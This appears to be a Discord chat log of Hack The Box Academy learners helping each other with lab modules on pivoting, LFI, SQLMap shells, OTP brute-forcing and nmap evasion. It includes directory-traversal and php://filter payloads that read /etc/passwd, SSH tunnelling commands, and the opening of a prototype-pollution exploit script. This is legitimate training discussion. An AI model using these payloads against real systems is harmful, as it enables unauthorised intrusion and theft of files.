#modules

Module: Password attacks
section: Pass the ticket from Linux
Question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
So i configured my proxychain.conf to the 127.0.0.1 1080 and ran chisel on the david account (rdp)
but once i try to run my vmiexec i just dont get anything. i dont understand from where it takes "4.2.2.2:53" either?
also the julio ticket i imported aswell

it's easier to just pth from that linux host iirc, if you want to pivot you'll need to add entries to your hosts file and set KRB5CCNAME

i did that already

what about your hosts file?

and for impacket you should use -k -no-pass to use kerberos auth

use the fqdn

I have a question related to Footprinting Module DNS section, question 3. It seems that the correct way to find the host is to enumerate ||dev.inlanefreight.htb|| . But I don't quite get the reason behind enumerating this subdomain in particular. Or am I getting it wrong and you are supposed to brute force all subdomains discovered to find additional hosts 1 by 1 and you would eventually come up the right one ?

If that is the case if you were to use a comprehensive list like dns-JHaddix, it would take quite a while....

where do you mean? in proxychains? or in my hosts? isnt it correct there? or im stupid?

idk why is your proxychains trying to look up to some random dns server

try fqdn in your wmiexec

idk why it goes to 4.2.2.2

its a fresh parrot os install aswell

use ligolo

ffs
well ill try with evil and rebues
if that doesnt work ill get ligolo and check how it works. never worked with ligolo before

check your proxychains config

cat /etc/proxychains.conf 
# proxychains.conf  VER 3.1
#
#        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#    

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see  chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns 

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
#       type  host  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#
#        Examples:
#
#                socks5    192.168.67.78    1080    lamer    secret
#        http    192.168.89.3    8080    justu    hidden
#         socks4    192.168.1.49    1080
#            http    192.168.39.93    8080    
#        
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
socks5 127.0.0.1 1080
# meanwile
# defaults set to "tor"

[ProxyList]

socks5 127.0.0.1 1080

by "check your proxychains config" I meant you should check it, not me

well i did multiple times already

any ideas on this ?

just a guess based on enumeration, often d* and a* endpoints are really interesting as they often contain things that a live site might not

or even in*

Im having a problem running any mssql script

well, did you use -d to debug?

yes, i dont know how to fix it

your nmap's ms-sql script is having issues!

How do i fix?

hmm, seems like the script itself is throwin' that error!

just don't worry about using scripts

more than one way to enumerate an mssql server

and usually it involves authentication

okay, let me use metasploit then

Mhm!

hey, I'm currently working on the XSS module and I'm kinda stuck at the phishing section. Is there anyone who is able to help?

What part are you stuck on? What have you tried?

Well, I figured out how to get XSS. Im now trying to follow along with the module. but now im stuck on getting the page to look how it should. In the module they use the functions "document.write()" and "document.getElementById().remove()" to create the fake login portal and then clean it up. But neither of those functions work for me

hi everyone

in "Dynamic Port Forwarding with SSH and SOCKS Tunneling" for solving the second question. proxychains tool is not on the ubuntu server and nmap also. so how to solve it?

You use proxychains from your system

Set up pivot; then from your system using nmap/proxychains

wooooh ! got it

like the diagram

i think i have to only use ubuntu . then from their move forward

Proxychains is used from your attack system generally

thanks mate 🙂

Once you get the major idea of how it works down, look into ligolo-ng - it combines a lot of the underlying pivoting into one tool

https://tenor.com/view/viralhog-gun-fire-murica-flag-america-gif-12183553

...

nah but seriously though... america and germany have the best cyber universities

even Britain

Doing online studies like from HTB academy will be better

classes from Heilbronn, the NSA, Dod, and more

but think about official degrees and certs especially as a russian immigrant...

still gets beaten by russian/chinese/asian

That doesn't matter

Degrees sure

oh yh i forgot about japan

but no way does russia beat america in cyber

But you don't need degrees to get certs

Sure

https://tenor.com/view/shrek-shrek-rizz-rizz-gif-11157824601050747846

There's a reason some of the Big APT groups are Russian

Don't you like Russia?

And often are state-backed

but a degree from a recognized university will get this mans set up good

Not really

i do its not about that though my guy

Most jobs could care less what uni you studied in

If you have certs

And certs will generally be cheaper than Uni

ok but are HTB certs nationally recognized...?

bro 😂

Either way not the place for this convo

There's a #careers-and-certs channel

#careers-and-certs

nah dont laugh i just started too now im invested in what my best route would be

Jump in there!

@peak rover if you link your htb account following #welcome you can access #careers-and-certs and get far more valuable input

long story short pick a feild get a cert and stuck to it

From people that are actually in the field

i cant do multiple thingies?

Not just a skid who thinks they know what they're talking about

Okay, I'll do it now

It's best to start narrow

Focus on one thing, then learn and expand

who you referring to hmmm 🤓

You

but mericuh

You

But no experience

he can be realistic sometimse ,cope

#careers-and-certs well that is for a reason! let other get some help in here! 😆

@peak rover read and follow the #welcome instructions

Can you imagine if just one of those exploded in the tube. That would be a bad day.

why does that go through your head 💀

Probably because I've seen it happen.

No one had them strapped to their arms though.

Question: Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host. Hint for the flag is The flag is in a very common directory! i tried many common directories but no luck.

for the miscellaneous techniques section on windows privilege escalation, is the account in the exercise reffering to a local account

/root/ /tmp/ many places

tried but no luck.

Did you even try using find?

find / -name "flag.txt"

Did you also just try checking the filesystem root

Not able to move from /var/www/html

Module Name: SQLMap Essentials -> OS Exploitation

You don't need to be able to move to read files

ive already got system, and checked mimikatz and secretsdump, the password hashes that i cracked don't get accepted either

Try ls /

Here it is but how to read it?

It sounds like you don't understand linux basics

cat /path/to/file since it's in filesystem root (/) figure out from there

Also this contains a spoiler, please delete the image

I did but here's little bit confusion btw thanks.

Wdym confusion?

There's relative and absolute paths

ls on its own just lists the current directory

You can supply a filepath to have it list a specific directory

For instance if you want to list /tmp/ without cd into it, you'd just ls /tmp/

I suggest doing the linux fundamentals module

Btw still need to delete this

Got the flag btw I've already done the fundamentals.

It contains a spoiler for the other flag

Sure. i'll delete it.

Then it sounds like you don't understand how linux and commands work

I did understand it. Actually i tried with this command cat / flag.txt i did'nt saw the space.

Btw thanks.

could someone help with this

starts with ! and ends with c

is it in rockyou

no, you can find it in the system

is the password encrypted

no

is ligolo-ng a tool?

Yes

i noted your line in my notes 😁

Has anyone solved Broken Authentication recently?

I am stuck.

Are we supposed to enumerate user names from Login or register then brute force the password?

yh

Is there a defacto tool for sucking down the contents of a mailbox via IMAP? What do you guys use for that? A little searching turned up some weak looking candidates or Windows-only stuff.

yeah

You can use curl I believe I forget the full syntax, I remember though it uses imap://ip though

But tbh there's not too many emails in these practice labs

Like one maybe two

The proper way to fetch an email in imap is 1 fetch 1 body[] btw

Idk why they give you the "all" command

It gives you mostly informational stuff about the email, but doesn't read it

Thanks, I'll look more into curl. I saw the commands for working with individual IMAP folders but I'm sure there's a small script to iterate if that kind of thing isn't baked in already.

Yeah, I'm seeing there's never any real email in there except the ones you're supposed to see.

Getting pretty fast at the manual navigation hah

But it'd still be nice to just suck the whole thing down and ls/grep out the important stuff. Checking all the folders available is a little bit of a drag.

Aaaand... finished with the Footprinting module. I gotta admit, the labs are a ton of fun even when I'm vexed by some mundane detail.

Network enumartion with nmap - Firewall and IDS/IPS Evasion - Medium Lab

can someone help guide me in the right direction for this section because im stuggling with it

Source port

Make sure you also disable a bunch of the ping stuff

keeps giving me filtered

i cant seem to get the version of the DNS server

--source-port

Why are you setting source port that high?

i seen it in the walkthrough in the module

Wrong section

And none of the sections use that high of a source port

Remember maybe the dns is misconfigured

What if it thinks you're dns

Also if you give it too many alerts it'll block you outright

And you'll have to reset anyway

(Or wait the like 10 minutes)

Why 143?

its an open port

also -sA is better than -sS right?

Meh

Your source port is incorrect

how can I decide what my source port is

I suggest re-reading the evasion section regarding dns

And source port

More specifically what port is dns

A misconfiguration could allow it to be scanned if the source port of the attacker comes from the "dns" port

I found a perl script for getting all the IMAP messages. It's not great but it seems to work. Weird syntax. iu-dump in particular from the linked repo.
Curl outputs to stdout and I haven't figured out how to split into separate files. Neither fetchmail or getmail do what I want.
https://github.com/mtsatsenko/imaputils

I wonder how that works in the real world, someone's gigabyte sized inbox. Are you going to download the whole dang thing to sift for details kind of search for "passwords" or whatever and move on?

I got it!!

Generally look for things tagged "important," also in a real engagement you're looking at a corporate inbox. Not a random gmail/outlook email

Imap is good for this because inboxes can be tagged and sorted, pop3 does not

andybody done he module: INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
i don't know why the meterpreter sessions comes not to run...would appreciate some help

Is it worth posting your modules every time you complete them to linkedIn like sharing showing youve completed the labs?

out of topic but ye !

this is old but gold. thank you. helped me understand the concept

Up to you tbh

It is time to share that I have officially reached 100% completion for the CPTS. Exam time is nigh. 🥇🔥💯

Congrats!!!

Any help?

Do whatever is taught by the module

I did. I just need a nudge in the right direction

The users are all available. The headers for "local auth" give nothing

I am confused

Escaping Restricted Shells in linux privilege esclation. how to bypass rbash.

literally everything has / in it. nothing is working. no programming languages installed

https://systemweakness.com/how-to-breakout-of-rbash-restricted-bash-4e07f0fd95e maybe this?

"no programming languages installed" I doubt that

rbash is just restricted bash so you gotta find a way around it

Damn I cant ask my question in general

read and follow #welcome to access it

Yeah but I need to finish thm practical ethical hacking first, so I just wanted to ask if it is good and what can I kearn from it if I dont pay for it since it looks like all videos are unlocked

well this channel/server isn't really gonna give you useful answers for THM

you'd have to go to the THM discord and ask

i cant do these modules the VM's keep dieing 😦

power through~

Hmm,

I am stuck at the OTP rn.

I bruteforced for about 2 million or something

Not a single one works

Context me?

OTP? @turbid echo

Anyone else having issues w/ targets spawning or is it just me?

Yeah mines taking abnormally long to spawn right now...

What module / region?

After I got the Gladys user it asks for an OTP. I bruteforced a lot. Nothing comes.

Any hints for the OTP part?

Are you talking about One Time Password or? Just so I understand the acronym 🙂

Also, which module is this?

Yes the one time password

Which module are you working on?

Broken Authentication

I just solved it

Nice!

Can you tell me what to do with the OTP. I did try to brute force from 0 to 999999

I dont believe I've started BA yet, even though CPTS covers a lot of Web App.

Nothing works

Ill take a look too

Any hints?

yup i had the same issue. the rate limiting is strong

It doesn't stop me. Which is weird. 😭

How many numbers is the OTP though?

if you enter a couple otp and refresh the page you'll see you're logged out

I think I understand how to solve it as well

Yeah. But when I use burp it still works.

Like in repeater I get the invalid otp page before I am redirected.

So I just ignored it.

Burp can give you a lot of noise depending what you're doing. The example uses ffuf.

i was not able to get otp working either.

Do I need to put the X-Forwarded-For header?

i never did the module before they changed it i wonder what the old skills assessment was

i tried that too. i tried scripting it to randomize the ip every time but no matter what i did i got rate limited. and there are too many otp codes to go through before the box dies if you do it super slow. i limited ffuf to do it 1 per second and it still logged me out due to rate limiting.

How to solve it then? 🥲

everything you need is in the module. i can't really think of a way to say it without giving it all away.

Which part at least?

So I will not bruteforce the OTP?

i wasn't able to do it

I changed parameters
I added the header
I changed methods

I don't know what more to do

Start from the beginning helps. This OTP seems p easy of an exercise. I'm working on the OTP section rn

What beginning? I am not sure I follow.

I got the user and the password

Of the module and get to the relevant section you're having issues with. Google is also your friend, but keep it in context.

you don't need google

it's all in the module.

Fair, but remember those times we ran into AD?

take a moment and think about the module contents. go review the sections. think to yourself what other options you have if you've exhausted one resource.

Kinda the mindset I was goin with haha

as i said before, i was also not able to brute force the otp.

I changed the method
The headers
I added parameters

The cookie looks random

k. so if you can't brute force it, go look at the sections and think about what else you can do.

Direct access?

from which module/section is that @turbid echo

Broken Authentication skills assessment

Just solved it. Aggghhh

nice work

a bit tricky huh heheh

Hay does someone has e-book for python ?

Could anyone help me

I thought Python Crash Course: A Hands-On, Project-Based Introduction to Programming by Eric Matthes was really good. This isn't really the place for that though, this is about htb modules.

I totally forgot about the original landing page.

I found my starting with Python was great using Python for Everybody

Dr. Chuck is a legend.

Automate the boring stuff with python.

https://automatetheboringstuff.com/

Tk

Remote/Reverse Port Forwarding with SSH my brain is not able to fetch the logic. seems very difficult. i know its easy.

I got a problem

So I tried to run the commands for public exploits in getting started

Have you learned about subnets?

and I got the same error in two separate instances.

i did CCNA mate

rhosts and rport

yeah

So which part was confusing about reverse port forwarding

This is what it's asking me to do though.

if rport is what I need to do, then this would be misleading instructions.

yes but it didn't ask you to put the port in rhosts

You set rhost and rport separately

Rhost: remote host
Rport: remote port

i read the whole module very easy stuff but one thing is here that " we are using ubuntu for pivot to the target we setup the listening port with localhost to forward the remort port traffic on our local port. the remote target 172.x.x.x have connection with ubuntu. and we just setup our localhost and port for remote port to listen on "

Type options. It will show you if the exploit requires a port set.

You set it like you would rhosts

It depends

but how the 172 can contact to our attack host what is between except pivot?

oh yeah it probably does actually

The pivot forwards the packets

I did though

How do you set the RHOST?

No you didnt

nevermind

Rhost: ip
Rport: port

you mean to and fro

They are separate options for a reason

Implied yes

It does networking magic with the packets, but nonetheless it forwards them

Set rhosts to just the ip

Not the ip:port

content in pivoting module is easy. but tricky. can you suggest some other for easy understanding

Look at the word before you typed "RHOSTS". Think about how you may have to set other options. Type "options" to see what options you need to configure.

so respawn?

or a different attack?

No

try and see

I did

It seems you're missing some crucial info

Try to formulate your thought process into words instead of screenshots only

To attack a target, start with the most simplest thing you can think of

You're doing the getting started -- public exploits section, yes?

Get some information about the target, use that and pwn

Yes.

Then eternalblue is not the answer

Enumerate the target first before immediately jumping to what the example shows

As the example is purely that, an example of how you'd search for an exploit

Usually the docker containers are hosting a web service

http://ip:port

content in pivoting module is easy. but tricky. can you suggest some other for easy understanding

Ok, then the examples aren't that helpful if I don't know the correct commands to use.

Not off the top of my head

Examples won't always be spoonfeeding answers to you dude

It shows you how to search

Enumerate the target first, then search based off that info

172 contacts the Ubuntu

Remote/Reverse Port Forwarding with SSH so here in example payload is copied to windows. is there need to use proxychains xfreerdp to copy it to windows

That's not really what I'm after but what would be helpful would be a table list of commands to try out. Process of elimination.

Brother

hmm ok

Look. At. The. Target.

If you look at the web page of the target host it'll tell you basically what to search

can i dm?

Yeah but it might take me some time to respond

The target is a web-based service that I need to pwn in order to gain some intel. I get that.

The public exploit section is basically a "go to google"

How do you normally view web based content?

Html or cmd

Did you try viewing the webpage first, or just assume

go to google, look at ExploitDB or Rapid7!

if I'm looking at code

Html isn't a mode

source code

view source page?, brp💀

Not all source code is html

check

But I digress

Your right

Just look at it in a browser

It'll save you a good chunk of headache

Since what to search will smack you in the face

Ok when I think of link I think of the web, when I think IP address I think cmd. I know they are one in the same but my mind just seems to use IP addresses simply for debugging.

not exactly a 1:1

but still

So does anything stand out to you?

A dns maps a domain name to an ip

You can visit any website via it's ip btw

that may not work if the IP hosts multiple vhosts though

If you refer to Nibbles - Web Footprinting part of Getting Started it will show you how to find what you will want to search in Metasploit later

MarcieLee already gave him the answer a couple times

It'll generally route (if set up) to its default domain, reverse lookup is fun

There will be plenty of web modules that use the docker_ip:port btw

Wordpress 2.7.10 which if I remember right is a very buggy and exploitable version. Well most of the earlier versions were.

Sometimes they'll tell you a vhost they want you to use

Not WordPress

But the plugin

It's fairly simple

Step 0: always enumerate

Simple Backup Plugin 2.7.10

Enumeration is like 90% of this

Now go have fun with that

It's why it's step 0

Never assume you're given all the info, expect to look for more pieces to the puzzle

I'm gonna take a break

are you still there?

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN <InternalIPofPivotHost>:8080 this is on listening state on the ubuntu and 0.0.0.0:8000 this is also on the listening state on our attack host. is it correct? what about ubuntu@<ipAddressofTarget>?

My brain went to GladOS.

"Are you still there?"

ok

english is my 4th language🙂 thats why

I didn't say that was a bad thing

got it

?

Hi, i hope everyone doing something productive. i am currently facing the issue while testing the LFI kindly see the below and let me know what i can do ? i sent the same message on support but they take alot time to reply. if anyone do that before kindly help me in this as my goal is not to complete the exercise but want to clear my concept

On the "PHP filters" section of File Inclusion module, i found the website at the "http://94.237.54.176:42648/index.php?language=en"

here "language=en" is the vulnerable target endpoint, you guys says we can read the content of php files without render them on the website using php filters that is "php://filter/read=convert.base64-encode/resource=config"
But my concern is that just forget the scenario that we have to read the content of config files on the website without render them, i just want to know how to test the LFI on that endpoint "language=en"

in the previous exercise (which is basic bypasses section) i tried these payloads:
../../../../../../../../../../../../../../../../etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....////....////....////....////....////....////....////....////etc/passwd
..././..././..././..././..././..././..././..././etc/passwd
..../..../..../..../..../..../..../..../etc/passwd
http://<domain>/index.php?language=languages/../../../../etc/passwd
http://<domain>/index.php?language=languages/../../../etc/passwd%00.php

and i got LFI with the help of one of the above payload, but in the current section (which is php filters) here we have goal to read the php config files content without render them on the website as html content. But before that i want to test LFI on it, as you already says in the article that once we have find the LFI in the websites then we go this approach of reading the content of php config files without render them

so please give me exact method to identify the LFI in this exercise, as i already tried the above payloads in this section, also tried in the "URL encoded" form using burp decoder even with double encoded.

i know , how to read the file content, but i want to learn how to test LFI in this parameter, as you guys teach me the method of reading php config files content without render them on the website but that was the 2nd step.
tell me 1st step how to idenify the LFI as i am try many method that you guys teach me in the previous module "basic bypasses" but they did not work for me. even i tried the payload list of directory traversal from "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory Traversal/Intruder/directory_traversal.txt" But it would not work for me
94.237.49.212:49813

for your ease here is the target, it is up for next 1 hour

Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer

yes, i already did this

i got the configure.php file

i used this payload "http://94.237.49.212:49813/index.php?language=php://filter/read=convert.base64-encode/resource=configure"

but this is not my question to get the flag.

As in the Academy , they said once you identify the LFI in the application endpoint then we will go to this approach of accessing the configuration files content without render them as html in the website

so when i try to test the endpoint "http://94.237.49.212:49813/index.php?language=en" for LFI, i did not get success

is it supposed to be "en"?

🤔

like in real word, first we have to find the endpoint that is vulnerable to LFi then we go for reading config files using the php filter "php://filter/read=convert.base64-encode/resource=file_name"
"

yes

ah ok then

Sorry, i did not get your point ? are you asking something from me ?

not really i thought langauge=php and language=en dont really go togather

yes, "en" will be replaced by php filter payload

Will I be able to access the entire SOC Analyst path if I get the Student subscription?
It says all modules upto Tier 2 included
I don't know how to identify if the SOC path is tier 2 or not

If you fuzz for php files, you will see that there is an en.php and other languages as php files. A clear indicator for LFI

Yes, with the student subscription you can access all modules for the paths CBBH, CPTS and CDSA

"http://94.237.49.212:49813/index.php?language=en "

You means in the above link we fuzz "en" parameter with php extension. I think they just gives us files that is accessible within the current directory
For example in this directory "/var/www/html/project/" our project is placed with files

1. index.php
2. es.php
3. en.php
4. configure.php

In index.php we define input parameter that just accept the files from current working directory. (i don't think that will be LFI)

What about if i want to access /etc/passwd file content, in the "language=es" parameter. Then why it will not display the content if that was LFI

I tried this payload
http://94.237.49.212:49813/index.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

In the

Please correct me, i am new with LFI and just want to get my hand dirty with LFI stuff

Because the script ensures that you can only read files within the directory. This means that you cannot read other files, such as /etc/passwd

Thank you soo much, learn another technique!💪

Really appreciate your efforts👏

what academy modules are required to complete most of web challenges (tier 3)

Attacking AD

• Every windows machine no matter how many times a restart and wait 5 mins on each one, won't allow me to RDP

you are connected to RDP

mhmm

but black screen

you have the power to change it

I've tried resizing the screen and restarting it

simplify your approach

/relax-order-checks

sorry, I didn't think that the 'technical-issue' was actually meant to happen

hey folks i have a question in my country my isp cut internet connection to all the country , is there any thing to bypass it

they should make a module to challenge mapping just like module to machines

lol wdym then what do they provide if its not internet

I've just started the Pivoting, Tunneling, and Port Forwarding module and I've gone through the sections until Remote/Reverse Port Forwarding with SSH. Could someone please correct me if my understanding of the concept is incorrect?

So, the way I understand it is that once we've compromised a host, we can check if it has any other physical/virtual NICs that have an IP address assigned, meaning that host could have access to another subnet/network.

Local port forwarding would be using SSH to listen to services that are running locally on the victim machine and make it accessible to us on our attack host.

Dynamic Port Forwarding with SSH and SOCKS would be using the SOCKS protocol to send packets to a remote network via a pivot host. Can someone please clearly explain how the SSH and SOCKS tie into this part? I have a very lose understanding of it.

So with Dynamic Port Forwarding, the SSH client requests the SSH server to allow it to send TCP data over the SSH connection and the SSH client listens on port a port of our choice that we specify in the command, for example:

ssh -D 9050 <hostname>@<ip_addr>

And then we basically use proxychains to send the commands we want to run on the pivot host?

In the section, it specifies that proxychains is capable of redirecting TCP connections through TOR, SOCKS, and HTTP/HTTPS proxy servers and also allows us to chain multiple proxy servers together. So this means that a SOCKS service is installed on the pivot host?

So in an actual engagement would I need to install the SOCKS service before being able to pivot?

pretty much correct, execpt that SSH supports SOCKS by default so there's no need for extra config

Alrighty, but then is it not possible to pivot without SSH? Maybe the answer to this question is already in the module and my question is premature 😅

there are other ways to pivot besides SSH, some of them are covered in the module

I'd also recommend looking into ligolo-ng

Oh, okay. Thanks for letting me know. Also, in the section I'm currently reading (Meterpreter Tunneling and Port Forwarding) it states the following:

Note: Depending on the version the SOCKS server is running, we may occasionally need to changes socks4 to socks5 in proxychains.conf.
Is there a way to tell from the pivot host whether to use socks4 or socks5? Also, the meterpreter method uses a version socks4a, how is that different?

Alrighty, I'll definitely have a look into it. Is it not covered in the module?

that tool is not, but it's my go to pivoting tool

the versions default to different ports so that's one way to tell, but for the most part it wouldn't make much of a difference in the tunnel

Hello there, i am actually doing the password attacks module and i am at the windows local password attacks, i have to attack SAM but unfortunately it's lagging like hell, i am getting disconnected from freerdp and i can barely do anything when i am connected to it. Any hint welcome, i have to go but i ll read it later on, if someone already gone trough this

Default to different ports? So you mean after running that SSH command I'd have to do netstat -lanpt and check which port the pivot host is listening on if I wanna figure out the version?

you can specify the version in your proxychains.conf

So basically I can just always specify socks4 and if that doesn't work, then socks 5?

yep

Ah proxychain

did you fix the issue

Lol no

I deleted everything

use ligolo bud

Reinstalled
And it still threw me to 4.2.2.2
Then gave up for the day

Will do today. From what ive seen most ppl here prefer ligolo

it's based

I got across Linux local password attack section under PASSWORD ATTACK module after i stuck to get into system i used the HINT option yet, the credentials there didn’t work, nor the pw-attack file provided at the module resource and yes i used the mutation passwords too !
User k*** pwd: L*Y1 won’t work for me!

change vpn servers

iirc mutate that pass with the rule and brute it

I did that with the custom rule 🙂

yeah did you try to brute force with the list?

Can anyone help me hack a game?

Sure, with hydra and cme
Original list and the mutation list

which user is it for?

Also tried attacking the smb ftp services

K….

Wi.. too

from my notes the mutated list will have the password

don't use - - force in your hashcat command

Which section? I can double check too

Lme try with diff list !
Thanks

create the list by mutating this pass btw

Password attack
Linux local password attack - credential hunting in Linux

Yep like xreous said. A mutaed list from the L ...Y .....1

Found it, thanks 🙏

@next bronze hi

hey they cut it cause of bacheloria degree ,

Anybody who has completed Broken Authentication skill assessment (updated version)

target machine always take long time to spawn also it's sometimes host not recheable

Sorry, just wanted to clarify something. What's happening in the dynamic port forwarding is that I'm choosing the port for the attack host to communicate with port 22 on the pivot host, right?

And in this screenshot, it's communicating with a target machine on a remote network via a pivot host from attacker host port 3300 to the target machine's port 3389?

I don't understand why the term "relay" is used here. It's got me confused 😅

Hey has anyone done the Web Attacks Advanced File Disclosure module?

yes to both, there's a little more to it for the first question but it doesn't matter

it's just the pivot host is relaying/forwarding packets to the target

A little more to it? I'd like to understand if you're willing to explain

Ahh, okay, I thought there may some sort of internal loopback or smtg maybe.

the OS chooses a dynamic port to connect to the SSH server on the target, the -D port you're configuring where the SOCKS server is listening on to forward the traffic, the SSH tunnel is already establised at that point

Can someone pls tell what all should be done before accessing the tor
(( safely acces it....))

-D specifies where the server (aka the pivot host) is listening? I thought it specified where the attack host was listening?

SSH server vs SOCKS server

SSH server is running on the pivot, it is listening to incoming connection, SOCKS server starts on your own host, it is listening for packets to forward to the target

told you that you didn't need to know this

Hi guys, could you tell me the answer to the question in the module: 'Date SIEM Visualization Example 4: Users Added Or Removed From A Local Group'? I added a timestamp as a row for end results, but still no date is matching

bro today am also on the same module section. am stuck for clearing the concepts i saw videos on youtube i clear the concept but when i cam back and read the section again. its wipe out.

@next bronze thats why i ping you

am thinking from last 2.5 hours

what to do how to do

content is easy

but too tricky😢

see

there should be videos for this module

So it's basically like this if we try using RDP on a target that's on a directly unreachable network.

SSH:
Attack host sends the RDP connection request via the port you chose on the attacker's machine to port 22 on the pivot machine and then to 3389 on the target machine.

SOCKS:
Sends RDP request to the configured port locally, so it starts on a random port (5555) and then goes to the SOCKS port you chose (3300) and then from there leaves the localhost to the pivot host and onto the target machine? If this is correct, this means it doesn't go to destination port 22 on the pivot host when not used with SSH?

Or am I wrong? 😅

Wow

I'm able to answer the end-of-section questions so far since I know how to use the commands, I just want to understand the theory behind how it works.

woooo! same here

i think you are my replicated version lol

did the same

for the purpose of understanding dynamic pivoting with SSH, you just need to know SOCKS over SSH will listen on a port -D which will forward the packets of programs running through proxychains

Got it, so all I need to know is SOCKS is used over SSH, basically tunnelled inside SSH? Is that safe to say?

correct

Alrighty, thanks.

I'll move forward in that case.

hmm

yeah, reverse shell with a reverse tunnel

Having internet connection troubles 💀

read the module and understand it, @normal sand got it so can you

@next bronze this is what I mentioned earlier right? About the service having it's own port and then sending it to another other local port (of my choice) to be forwarded to the pivot?

Also, sorry, I hope it's alright I pinged you 😓

yes in this case traffic from local:3300 will be forwarded to remote:3389

Thanks!

Is this a mistake? Cuz it doesn't show local port forward with metasploit on this page? It just shows regular port forwarding/dynamic port forwarding. Not sure if the term I've used is right.
https://academy.hackthebox.com/module/158/section/1428

local port forward is regular port forward

is there a module -> challenge mapping anywhere in external sources or in htb

Oh okay. I was confused because under the section, Dynamic Port Forwarding with SSH and SOCKS Tunneling, it has a section on local port forwarding where it shows an example of how to access a local mysql service on a target host. This was before they introduced how to access a machine on a different network using a pivot host. So I thought that when a pivot host is used to access another machine, it's called "Dynamic Port Forwarding" and when it's only accessing a local service on a target machine, it's called "Local Port Forwarding". So I was wrong in that assumption, yeah?

rule of thumb is that if you're using proxychains, it's dynamic port forwarding, if your port forward only opens 1 port, it's local/regualr port forwarding

on the skills assessment for windows privilege escalation part i, is the seimpersonateprivilege on the foothold user a rabbit hole

What do you mean by opens only 1 port? Would that be the example of accessing a local mysql service on a target host that is directly accessible? Or would it be accessing a target machine via exactly 1 pivot host?

that means you're only reaching one port through the tunnel, it can be reaching a localhost mysql or a rdp on a remote host

no

it is exploitable

Ah okay, so both the cases I gave are applicable. Essentially if you're accessing more than one additional port (I'm including the one used for communication), then it's dynamic.

yeah

thats right

When we say one port, we're referring to non-local host ports, yeah?

@next bronze

i guess no

That doesn't sound right...? I've no clue 😂

its about one ort

port

doesn't matter where the target port is open at

local: L.I:L.P:R.I:R.P, what ever comes on L.I ip on L.P port, forward it to R.I ip on R.P port

basically as I've said, rule of thumb is that if you're using proxychains, it's dynamic port forwarding, anything else it's just regualr port forwarding

Okay, understood, I hadn't read it properly before. Thanks for reiterating and all your help.

dynamic is like a tunnel

local is like piping

both are technically tunnels, just that dynamic, as the name suggests, you can reach multiple ports/targets through it

@next bronze buddy is
genius

dynamic means like changing

dynamic means we can forward any port means we can access any port in local and remote only one port

Module - Footprinting, Lab - easy. I was able to find the ssh private key by authenticating to ftp with credentials provided in the lab, why does the solution ask to perform zone transfer, then subdomain brute force of internal domain? im confused

@normal sand SOCKS Client and Server:
SOCKS Client: This is your local machine (or any tool on it) that wants to access a network or service it can't reach directly.
SOCKS Server: This is the Ubuntu server you're connecting to via SSH, which will act as a middleman to forward your traffic.

Establishing the Connection:
    You use SSH to create a tunnel between your local machine and the Ubuntu server. This tunnel acts like a pipeline for your network traffic.
    On your local machine, you set up a SOCKS proxy. This proxy listens for traffic and forwards it through the SSH tunnel to the Ubuntu server.

Routing the Traffic:
    When your local machine (the SOCKS client) needs to access a service or network, it sends the traffic to the SOCKS proxy.
    The SOCKS proxy then sends this traffic through the SSH tunnel to the Ubuntu server.
    The Ubuntu server forwards the traffic to the final destination on your behalf.
    The responses from the destination are sent back through the same route, returning to your local machine.

Summary in Simple Terms

You (client): Want to access a remote network.
Ubuntu server (SOCKS server): Helps you reach the remote network.
SOCKS proxy: A special setup on your machine that sends your requests to the Ubuntu server.
Traffic flow: Your requests -> SOCKS proxy -> SSH tunnel -> Ubuntu server -> Remote network.

read it mate now mine concepts are being clear

can i dm?

sure

For Padding Oracle Attacks how do u determin block size?

or is it just a random guess

Under HTTPS/TLS ATTACKS module

Hi I'm trying to do the AttackFTP form Attacking common Service, but there's no FTP service. I restarted many times target host and always waited some minutes before try to scan it but nothing till now. May I ask for some suggestions?

did you check unusual ports

yep, but nothing there too

I tried with nmap and rustscan too

there has to be one can you show your nmap output

you broght me luck! At the 10th attempt something show on an unusual port 👍

can anyone help me with prototype pollution RCE exercise

can anyone explain why im not being able to update the polluted attribute

||smb: > ls
. D 0 Wed Nov 10 11:12:22 2021
.. D 0 Wed Nov 10 11:12:22 2021
important.txt A 16 Wed Nov 10 11:12:55 2021

            10328063 blocks of size 4096. 6101346 blocks available

smb: > get important.txt
Error opening local file important.txt||
I am trying to get a file from the share, i am not able to get it right. I checked the solutions, they did the same, but i'm getting the error, could not find something revelant on google. any ideas?

If youre working in the NFS direcotry created earlier, remember to change it. 😄

Anyone got any tips for taking notes while doing the modules?
Feels like I am just copy and pasting most of the stuff until the challenge questions where I will make my own notes for the specific task.
Maybe copy and paste stuff then go back and revise it/summarize into my own words after?

can anyone help me with prototype pollution RCE exercise

import requests

url = 'http://94.237.63.224:43887'
headers = {
    "Content-Type" : "application/json"
}

# register
requests.post(f"{url}/register", json={
    "username":"test",
    "password":"test"
}, headers=headers)

# login
headers["Cookie"] = requests.post(f"{url}/login", json={
    "username":"test",
